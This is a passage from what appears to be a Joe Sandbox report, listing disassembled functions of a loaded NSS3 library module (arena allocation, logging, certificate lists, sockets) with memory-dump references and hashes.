                                                            • DeleteCriticalSection.KERNEL32(6CB1A6D8), ref: 6CB1AE36
                                                            • free.MOZGLUE(?), ref: 6CB1AE3D
                                                            • free.MOZGLUE(00000000,00000000,?,?,6CB1A6D8), ref: 6CB1AE47
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$CriticalDeleteSection
                                                            • String ID:
                                                            • API String ID: 682657753-0
                                                            • Opcode ID: 4494a0f70d0084ff905451e4138124cb6facdc9b9e9ae0143d77b8286d9e2e55
                                                            • Instruction ID: 437bbb72df80369591124717117b36e58046f0bbbf571c8d9f18e13eb1b93845
                                                            • Opcode Fuzzy Hash: 4494a0f70d0084ff905451e4138124cb6facdc9b9e9ae0143d77b8286d9e2e55
                                                            • Instruction Fuzzy Hash: 2FF0F67A601A05A7CA009FA8D8089177B7DFF8E774B200328F12A83940D731F015CFD6
                                                            Function 6C9A7C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9A7D35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: sqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 632333372-598938438
                                                            • Opcode ID: cde655b9fa7e794248f8e48a94a0910d0e1eef14b46a758d558ca98b5e1f668a
                                                            • Instruction ID: c65f2dbc3368ad83e861e4f2b6b9975abb458a779e5bc76e666eb6b26e81ad9f
                                                            • Opcode Fuzzy Hash: cde655b9fa7e794248f8e48a94a0910d0e1eef14b46a758d558ca98b5e1f668a
                                                            • Instruction Fuzzy Hash: 88311431E0427997C710CF9DC881DBAB7F5EF84315B594596E448B7B8AD270D842C7A0
                                                            Function 6C996C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C996D36
                                                            Strings
                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C996D20
                                                            • %s at line %d of [%.10s], xrefs: 6C996D2F
                                                            • database corruption, xrefs: 6C996D2A
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: sqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 632333372-598938438
                                                            • Opcode ID: 951f71b548ce694be74d74f5f084fdffcb7ab0a934ce79b4815a805429a8da76
                                                            • Instruction ID: 5079249b6fc9a80e7b3a4af4887a1b58e5ad2601302f4700bc1114c95692526d
                                                            • Opcode Fuzzy Hash: 951f71b548ce694be74d74f5f084fdffcb7ab0a934ce79b4815a805429a8da76
                                                            • Instruction Fuzzy Hash: 2C21F1316043059BC710CE19C841B5AB7F6AF95318F28892DD8699BFA1E771F948C7D2
                                                            Function 6CACCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 6CACCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CACCC7B), ref: 6CACCD7A
                                                              • Part of subcall function 6CACCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CACCD8E
                                                              • Part of subcall function 6CACCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CACCDA5
                                                              • Part of subcall function 6CACCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CACCDB8
                                                            • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CACCCB5
                                                            • memcpy.VCRUNTIME140(6CB614F4,6CB602AC,00000090), ref: 6CACCCD3
                                                            • memcpy.VCRUNTIME140(6CB61588,6CB602AC,00000090), ref: 6CACCD2B
                                                              • Part of subcall function 6C9E9AC0: socket.WSOCK32(?,00000017,6C9E99BE), ref: 6C9E9AE6
                                                              • Part of subcall function 6C9E9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C9E99BE), ref: 6C9E9AFC
                                                              • Part of subcall function 6C9F0590: closesocket.WSOCK32(6C9E9A8F,?,?,6C9E9A8F,00000000), ref: 6C9F0597
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                            • String ID: Ipv6_to_Ipv4 layer
                                                            • API String ID: 1231378898-412307543
                                                            • Opcode ID: 8498d9bca57b8af0bc6bf7642870b1c1192b9c8faf696023d8a3447a2b6c4b27
                                                            • Instruction ID: 97ceab1514950edd6150c8546ca31597da32adca52a67cb643ca5aa1d386f7f3
                                                            • Opcode Fuzzy Hash: 8498d9bca57b8af0bc6bf7642870b1c1192b9c8faf696023d8a3447a2b6c4b27
                                                            • Instruction Fuzzy Hash: 771181F6B082D05EDB009F5BD806776BAA8A757718F181029E41ADBFC1E771C8044BD7
                                                            Function 6CA31CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_Initialize), ref: 6CA31CD8
                                                            • PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6CA31CF1
                                                              • Part of subcall function 6CB109D0: PR_Now.NSS3 ref: 6CB10A22
                                                              • Part of subcall function 6CB109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB10A35
                                                              • Part of subcall function 6CB109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB10A66
                                                              • Part of subcall function 6CB109D0: PR_GetCurrentThread.NSS3 ref: 6CB10A70
                                                              • Part of subcall function 6CB109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB10A9D
                                                              • Part of subcall function 6CB109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB10AC8
                                                              • Part of subcall function 6CB109D0: PR_vsmprintf.NSS3(?,?), ref: 6CB10AE8
                                                              • Part of subcall function 6CB109D0: EnterCriticalSection.KERNEL32(?), ref: 6CB10B19
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB10B48
                                                              • Part of subcall function 6CB109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB10C76
                                                              • Part of subcall function 6CB109D0: PR_LogFlush.NSS3 ref: 6CB10C7E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                            • String ID: pInitArgs = 0x%p$C_Initialize
                                                            • API String ID: 1907330108-3943720641
                                                            • Opcode ID: d6488faa897c311b9ce067e8c8983285bb0bda69cb2db694bb3104eb321dc8d6
                                                            • Instruction ID: 92dd5594d650e60369a3433bec875684a289a1c8c21ecddc39d091e6896b373e
                                                            • Opcode Fuzzy Hash: d6488faa897c311b9ce067e8c8983285bb0bda69cb2db694bb3104eb321dc8d6
                                                            • Instruction Fuzzy Hash: 4D0180352011A09FEF019B6AE959B7932B9ABC23A9F085025E50DD3A91DF34D889C792
                                                            Function 6CA71D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CA71D8F
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CA71DA6
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA71E13
                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA71ED0
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                            • String ID:
                                                            • API String ID: 84796498-0
                                                            • Opcode ID: ddb2b777ed5aab6a1526be00bc265f2f07df360be518821090c45d49d6047b99
                                                            • Instruction ID: 02582e39c9cbc4b190c748e550c3d60300c412e0f74eb70e870658e73ccda029
                                                            • Opcode Fuzzy Hash: ddb2b777ed5aab6a1526be00bc265f2f07df360be518821090c45d49d6047b99
                                                            • Instruction Fuzzy Hash: 7D515B75A002098FDB14CF94C894BBEB7FABF45308F144129E91D9B751D731E989CBA0
                                                            Function 6CAD7DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAD7E10
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAD7EA6
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAD7EB5
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CAD7ED8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: _byteswap_ulong
                                                            • String ID:
                                                            • API String ID: 4101233201-0
                                                            • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                            • Instruction ID: de061e85497c5bc520fdacb1951e8b0e2d05f447d20b3bca3416d6ee491c3efe
                                                            • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                            • Instruction Fuzzy Hash: 683184B1A011118FDB08CF09D89099EBBB2BF8831871B8569D8599BB15EB71EC45CBD1
                                                            Function 6CA06C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA06C8D
                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA06CA9
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CA06CC0
                                                            • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CB28FE0), ref: 6CA06CFE
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                            • String ID:
                                                            • API String ID: 2370200771-0
                                                            • Opcode ID: 6150db4ae02b20706fbf35d16442c8b3ceacc3bad4fad178f6ebce28c8bda0ff
                                                            • Instruction ID: 6f542a9b984a292c9e261c8b9cb99190d6043a4e12ebd50542808b681bd4af00
                                                            • Opcode Fuzzy Hash: 6150db4ae02b20706fbf35d16442c8b3ceacc3bad4fad178f6ebce28c8bda0ff
                                                            • Instruction Fuzzy Hash: 633180B5A002169FDB04CF65D891ABFBBF5EF4528CB14442DDD05D7700EB319985CBA0
                                                            Function 6CA76DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6CA76E36
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA76E57
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6CA76E7D
                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6CA76EAA
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: IntervalMilliseconds$ErrorValue
                                                            • String ID:
                                                            • API String ID: 3163584228-0
                                                            • Opcode ID: 2876adf79b6ddd0f93d774558eec6a800e48f17fdff301c78084ee19a1bf09d7
                                                            • Instruction ID: 75e8ceec07a45733001ee29af5968d9f075309903587248c7ba4b86f26375508
                                                            • Opcode Fuzzy Hash: 2876adf79b6ddd0f93d774558eec6a800e48f17fdff301c78084ee19a1bf09d7
                                                            • Instruction Fuzzy Hash: 8731C13A610612EEDB241E34DD04396B7B5BB0131AF14063CD899D6B91EB30A9D8CBB2
                                                            Function 6CA5DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CA5DDB1,?,00000000), ref: 6CA5DDF4
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CA5DDB1,?,00000000), ref: 6CA5DE0B
                                                            • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CA5DDB1,?,00000000), ref: 6CA5DE17
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • PR_SetError.NSS3(FFFFE009,00000000), ref: 6CA5DE80
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                            • String ID:
                                                            • API String ID: 3725328900-0
                                                            • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                            • Instruction ID: 7300c20f44699c70130f976295199e243c2281b1580e83563a0091f2d65ac252
                                                            • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                            • Instruction Fuzzy Hash: 023193B1E017429BE700CF56DA80666F7B4BFA5318B64C22ADD1987B01E771E5E4CB90
                                                            Function 6CA72DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CA72E08
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                            • PORT_NewArena_Util.NSS3(00000400), ref: 6CA72E1C
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CA72E3B
                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA72E95
                                                              • Part of subcall function 6CA61200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA088A4,00000000,00000000), ref: 6CA61228
                                                              • Part of subcall function 6CA61200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CA61238
                                                              • Part of subcall function 6CA61200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CA088A4,00000000,00000000), ref: 6CA6124B
                                                              • Part of subcall function 6CA61200: PR_CallOnce.NSS3(6CB62AA4,6CA612D0,00000000,00000000,00000000,?,6CA088A4,00000000,00000000), ref: 6CA6125D
                                                              • Part of subcall function 6CA61200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CA6126F
                                                              • Part of subcall function 6CA61200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CA61280
                                                              • Part of subcall function 6CA61200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CA6128E
                                                              • Part of subcall function 6CA61200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CA6129A
                                                              • Part of subcall function 6CA61200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CA612A1
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                            • String ID:
                                                            • API String ID: 1441289343-0
                                                            • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                            • Instruction ID: e06c9b6743cd8ce67791bdd3080646e479b03465d67799be95aa172f8b780dbc
                                                            • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                            • Instruction Fuzzy Hash: 4D21F5B5D003418BE710CF159D44BAA3B747F9130CF151369DD089B742F7B1E5C882A2
                                                            Function 6CA2ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CERT_NewCertList.NSS3 ref: 6CA2ACC2
                                                              • Part of subcall function 6CA02F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CA02F0A
                                                              • Part of subcall function 6CA02F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA02F1D
                                                              • Part of subcall function 6CA02AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CA00A1B,00000000), ref: 6CA02AF0
                                                              • Part of subcall function 6CA02AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA02B11
                                                            • CERT_DestroyCertList.NSS3(00000000), ref: 6CA2AD5E
                                                              • Part of subcall function 6CA457D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CA0B41E,00000000,00000000,?,00000000,?,6CA0B41E,00000000,00000000,00000001,?), ref: 6CA457E0
                                                              • Part of subcall function 6CA457D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CA45843
                                                            • CERT_DestroyCertList.NSS3(?), ref: 6CA2AD36
                                                              • Part of subcall function 6CA02F50: CERT_DestroyCertificate.NSS3(?), ref: 6CA02F65
                                                              • Part of subcall function 6CA02F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA02F83
